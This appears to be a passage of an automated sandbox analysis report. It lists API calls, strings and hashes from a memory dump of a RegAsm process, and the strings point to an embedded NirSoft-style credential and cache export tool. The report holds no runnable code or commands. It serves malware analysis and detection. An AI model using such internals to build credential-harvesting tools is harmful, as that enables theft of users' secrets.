                            • Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
                            • Opcode Fuzzy Hash: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                            • Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: _snwprintf$memset$wcscpy
                            • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                            • API String ID: 2000436516-3842416460
                            • Opcode ID: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                            • Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
                            • Opcode Fuzzy Hash: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                            • Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66
                            APIs
                              • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                              • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                              • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                              • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                              • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                              • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                              • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                              • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                              • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                              • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                              • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                            • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                            • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                            • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                            • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                            • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                            • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                            • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                            • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                            • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                            • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                            • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                            • LoadIconW.USER32(00000000,00000076), ref: 00403634
                            • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                            • LoadIconW.USER32(00000000,00000077), ref: 00403648
                            • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                            • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                            • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                            • LoadIconW.USER32(00000000,00000078), ref: 00403670
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                            • String ID:
                            • API String ID: 1043902810-0
                            • Opcode ID: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                            • Instruction ID: 42406aa8c1b655767e81280a563d2f976f29c17d6cb42a8b032fada3297a07e5
                            • Opcode Fuzzy Hash: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                            • Instruction Fuzzy Hash: B1212EA0B857087AF63137B2DC4BF7B7A5EDF81B89F214410F35C990E0C9E6AC108929
                            APIs
                              • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                              • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                            • ??3@YAXPAX@Z.MSVCRT ref: 0040E49A
                              • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                            • memset.MSVCRT ref: 0040E380
                              • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                              • Part of subcall function 0040AA29: memcpy.MSVCRT ref: 0040AA5B
                            • wcschr.MSVCRT ref: 0040E3B8
                            • memcpy.MSVCRT ref: 0040E3EC
                            • memcpy.MSVCRT ref: 0040E407
                            • memcpy.MSVCRT ref: 0040E422
                            • memcpy.MSVCRT ref: 0040E43D
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: memcpy$_wcsicmpmemset$??3@wcschrwcslen
                            • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                            • API String ID: 3073804840-2252543386
                            • Opcode ID: f8736963c1e408997af279cfc298981fa7ef611c2197f5f9bddedf84c8b339a3
                            • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                            • Opcode Fuzzy Hash: f8736963c1e408997af279cfc298981fa7ef611c2197f5f9bddedf84c8b339a3
                            • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: ??2@??3@_snwprintfwcscpy
                            • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                            • API String ID: 2899246560-1542517562
                            • Opcode ID: 79e099bb23a1393a239ae01641405c8b767ccdf12231d4bb76dd8066c9d8bd92
                            • Instruction ID: ddb1140ba30d93f946c39142265044aeba6ebe712c4753dd77c76fa61262b17a
                            • Opcode Fuzzy Hash: 79e099bb23a1393a239ae01641405c8b767ccdf12231d4bb76dd8066c9d8bd92
                            • Instruction Fuzzy Hash: 434127B2900218BAD704EFA1DC82DDEB7BCBF49305B110167BD05B3152DB78A655CBE8
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: memcpy$memcmp$ByteCharMultiWidememset
                            • String ID:
                            • API String ID: 3715365532-3916222277
                            • Opcode ID: f920f79086ebd03163bb660580745ba542768fbf6859bbba0dc8aac637b41020
                            • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                            • Opcode Fuzzy Hash: f920f79086ebd03163bb660580745ba542768fbf6859bbba0dc8aac637b41020
                            • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59
                            APIs
                              • Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                            • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                            • ??2@YAPAXI@Z.MSVCRT ref: 0040859D
                              • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                            • memset.MSVCRT ref: 004085CF
                            • memset.MSVCRT ref: 004085F1
                            • memset.MSVCRT ref: 00408606
                            • strcmp.MSVCRT ref: 00408645
                            • _mbscpy.MSVCRT ref: 004086DB
                            • _mbscpy.MSVCRT ref: 004086FA
                            • memset.MSVCRT ref: 0040870E
                            • strcmp.MSVCRT ref: 0040876B
                            • ??3@YAXPAX@Z.MSVCRT ref: 0040879D
                            • CloseHandle.KERNEL32(?), ref: 004087A6
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                            • String ID: ---
                            • API String ID: 3437578500-2854292027
                            • Opcode ID: deb32149b504d539516d0f42eccfd95bc3c0c038ac4760bb164b185877a325eb
                            • Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
                            • Opcode Fuzzy Hash: deb32149b504d539516d0f42eccfd95bc3c0c038ac4760bb164b185877a325eb
                            • Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9
                            APIs
                            • memset.MSVCRT ref: 0041087D
                            • memset.MSVCRT ref: 00410892
                            • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                            • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                            • SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                            • SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                            • GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                            • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                            • GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                            • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                            • GetSysColor.USER32(0000000F), ref: 00410999
                            • DeleteObject.GDI32(?), ref: 004109D0
                            • DeleteObject.GDI32(?), ref: 004109D6
                            • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
                            • String ID:
                            • API String ID: 1010922700-0
                            • Opcode ID: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                            • Instruction ID: e9b684d61d60cc1afb152275eb3c8de820581b68aaecd99ee02cab8be193ddee
                            • Opcode Fuzzy Hash: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                            • Instruction Fuzzy Hash: 48418575640304BFF720AF61DC8AF97779CFB09744F000829F399A51E1D6F6A8909B29
                            APIs
                              • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                            • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                            • malloc.MSVCRT ref: 004186B7
                            • ??3@YAXPAX@Z.MSVCRT ref: 004186C7
                            • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
                            • ??3@YAXPAX@Z.MSVCRT ref: 004186E0
                            • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
                            • malloc.MSVCRT ref: 004186FE
                            • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
                            • ??3@YAXPAX@Z.MSVCRT ref: 00418716
                            • ??3@YAXPAX@Z.MSVCRT ref: 0041872A
                            • ??3@YAXPAX@Z.MSVCRT ref: 00418749
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: ??3@$FullNamePath$malloc$Version
                            • String ID: |A
                            • API String ID: 4233704886-1717621600
                            • Opcode ID: 7e01f0dee03851588a79a4a26fa611e8dffd0452dbc09a85c2cc2e741f239264
                            • Instruction ID: f8a1ad7f3386c3a0ca67e8408a701755caa4d882ef8d2f884b3bc60851bd4b4d
                            • Opcode Fuzzy Hash: 7e01f0dee03851588a79a4a26fa611e8dffd0452dbc09a85c2cc2e741f239264
                            • Instruction Fuzzy Hash: F5217432900118BFEF11BFA6DC46CDFBB79DF41368B22006FF804A2161DA799E91995D
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: _wcsicmp
                            • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                            • API String ID: 2081463915-1959339147
                            • Opcode ID: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                            • Instruction ID: 8733bd8b557f913067c5021fbfe18d0583d9fd94efe92a6f612d034962822ca0
                            • Opcode Fuzzy Hash: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                            • Instruction Fuzzy Hash: A401843328931228FA2538663D07F834F48CB52BBBF32405BF800D81C6FE8C4565605E
                            APIs
                            • GetDC.USER32(00000000), ref: 004121FF
                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                            • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                            • SetBkMode.GDI32(?,00000001), ref: 00412232
                            • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                            • SelectObject.GDI32(?,?), ref: 00412251
                            • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                            • SelectObject.GDI32(00000014,00000005), ref: 00412291
                              • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                              • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                              • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                            • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                            • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                            • SetCursor.USER32(00000000), ref: 004122BC
                            • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                            • memcpy.MSVCRT ref: 0041234D
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                            • String ID:
                            • API String ID: 1700100422-0
                            • Opcode ID: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                            • Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
                            • Opcode Fuzzy Hash: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                            • Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
                            APIs
                            • GetClientRect.USER32(?,?), ref: 004111E0
                            • GetWindowRect.USER32(?,?), ref: 004111F6
                            • GetWindowRect.USER32(?,?), ref: 0041120C
                            • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                            • GetWindowRect.USER32(00000000), ref: 0041124D
                            • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                            • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                            • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                            • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                            • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                            • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                            • EndDeferWindowPos.USER32(?), ref: 0041130B
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: Window$Defer$Rect$BeginClientItemPoints
                            • String ID:
                            • API String ID: 552707033-0
                            • Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                            • Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
                            • Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                            • Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: memset$_snwprintf
                            • String ID: %%0.%df
                            • API String ID: 3473751417-763548558
                            • Opcode ID: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                            • Instruction ID: e3e507119e413e1699737691dcc770ce903c50d69a4f0c7cc4f670013a5326e5
                            • Opcode Fuzzy Hash: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                            • Instruction Fuzzy Hash: 2D318F71800129BBEB20DF95CC85FEB77BCFF49304F0104EAB509A2155E7349A94CBA9
                            APIs
                            • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                            • KillTimer.USER32(?,00000041), ref: 004060D7
                            • KillTimer.USER32(?,00000041), ref: 004060E8
                            • GetTickCount.KERNEL32 ref: 0040610B
                            • GetParent.USER32(?), ref: 00406136
                            • SendMessageW.USER32(00000000), ref: 0040613D
                            • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                            • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                            • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                            • String ID: A
                            • API String ID: 2892645895-3554254475
                            • Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                            • Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
                            • Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                            • Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
                            APIs
                            • LoadMenuW.USER32(?,?), ref: 0040D97F
                              • Part of subcall function 0040D7A7: GetMenuItemCount.USER32(?), ref: 0040D7BD
                              • Part of subcall function 0040D7A7: memset.MSVCRT ref: 0040D7DC
                              • Part of subcall function 0040D7A7: GetMenuItemInfoW.USER32 ref: 0040D818
                              • Part of subcall function 0040D7A7: wcschr.MSVCRT ref: 0040D830
                            • DestroyMenu.USER32(00000000), ref: 0040D99D
                            • CreateDialogParamW.USER32(?,?,00000000,0040D952,00000000), ref: 0040D9F2
                            • GetDesktopWindow.USER32 ref: 0040D9FD
                            • CreateDialogParamW.USER32(?,?,00000000), ref: 0040DA0A
                            • memset.MSVCRT ref: 0040DA23
                            • GetWindowTextW.USER32(00000005,?,00001000), ref: 0040DA3A
                            • EnumChildWindows.USER32(00000005,Function_0000D898,00000000), ref: 0040DA67
                            • DestroyWindow.USER32(00000005), ref: 0040DA70
                              • Part of subcall function 0040D5D6: _snwprintf.MSVCRT ref: 0040D5FB
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                            • String ID: caption
                            • API String ID: 973020956-4135340389
                            • Opcode ID: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                            • Instruction ID: d77e6bedd7727d4aace6f5c0bd160524984489d6dc7b24eaa8e7ecc9459ec1fc
                            • Opcode Fuzzy Hash: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                            • Instruction Fuzzy Hash: 60319072900208BFEF11AF91DC85EAA3B78FF04315F10843AF909A61A1D7799D58CF59
                            APIs
                            Strings
                            • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00410A70
                            • <table dir="rtl"><tr><td>, xrefs: 00410B00
                            • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00410B3C
                            • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00410ADD
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: memset$_snwprintf$wcscpy
                            • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                            • API String ID: 1283228442-2366825230
                            • Opcode ID: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                            • Instruction ID: da896b014e5ee892582fb8e7d48e4383de9842bc572d8210300f5843ce7472f7
                            • Opcode Fuzzy Hash: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                            • Instruction Fuzzy Hash: 5C2182B69002197BDB21AB95CC41EDE77BCAF08785F0040ABF549D3151DA789F888BA9
                            APIs
                            • wcschr.MSVCRT ref: 00413972
                            • wcscpy.MSVCRT ref: 00413982
                              • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                              • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                              • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                            • wcscpy.MSVCRT ref: 004139D1
                            • wcscat.MSVCRT ref: 004139DC
                            • memset.MSVCRT ref: 004139B8
                              • Part of subcall function 00409DD5: GetWindowsDirectoryW.KERNEL32(0045DC58,00000104,?,00413A11,?,?,00000000,00000208,?), ref: 00409DEB
                              • Part of subcall function 00409DD5: wcscpy.MSVCRT ref: 00409DFB
                            • memset.MSVCRT ref: 00413A00
                            • memcpy.MSVCRT ref: 00413A1B
                            • wcscat.MSVCRT ref: 00413A27
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                            • String ID: \systemroot
                            • API String ID: 4173585201-1821301763
                            • Opcode ID: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                            • Instruction ID: a9582ad2fab6187976d7b5f1d827ce349b207672d34ede1993470c6c3fb504e1
                            • Opcode Fuzzy Hash: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                            • Instruction Fuzzy Hash: 7D21F6F68053146AE720FB619C86EEF73EC9F06719F20415FF115A20C6EA7C9A844B5E
                            APIs
                            • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: HandleModule
                            • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                            • API String ID: 4139908857-2887671607
                            • Opcode ID: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                            • Instruction ID: 8dd6b0f06cc06780b82abcfa5335c49c30c65db347d43124f897848efd9f6b7c
                            • Opcode Fuzzy Hash: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                            • Instruction Fuzzy Hash: 8C015E75D48324AACB339F75AD09A053FB1EF04797B1004B7A80492266DAF9815CDE4C
                            APIs
                              • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                            • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                              • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                              • Part of subcall function 0040BFF3: memcpy.MSVCRT ref: 0040C024
                            • memcpy.MSVCRT ref: 0040C11B
                            • strchr.MSVCRT ref: 0040C140
                            • strchr.MSVCRT ref: 0040C151
                            • _strlwr.MSVCRT ref: 0040C15F
                            • memset.MSVCRT ref: 0040C17A
                            • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: Filememcpystrchr$CloseHandlePointerSize_memicmp_strlwrmemset
                            • String ID: 4$h
                            • API String ID: 4019544885-1856150674
                            • Opcode ID: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                            • Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
                            • Opcode Fuzzy Hash: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                            • Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                            • String ID: 0$6
                            • API String ID: 4066108131-3849865405
                            • Opcode ID: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                            • Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
                            • Opcode Fuzzy Hash: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                            • Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B
                            APIs
                            • memset.MSVCRT ref: 004082EF
                              • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                            • memset.MSVCRT ref: 00408362
                            • memset.MSVCRT ref: 00408377
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: memset$ByteCharMultiWide
                            • String ID:
                            • API String ID: 290601579-0
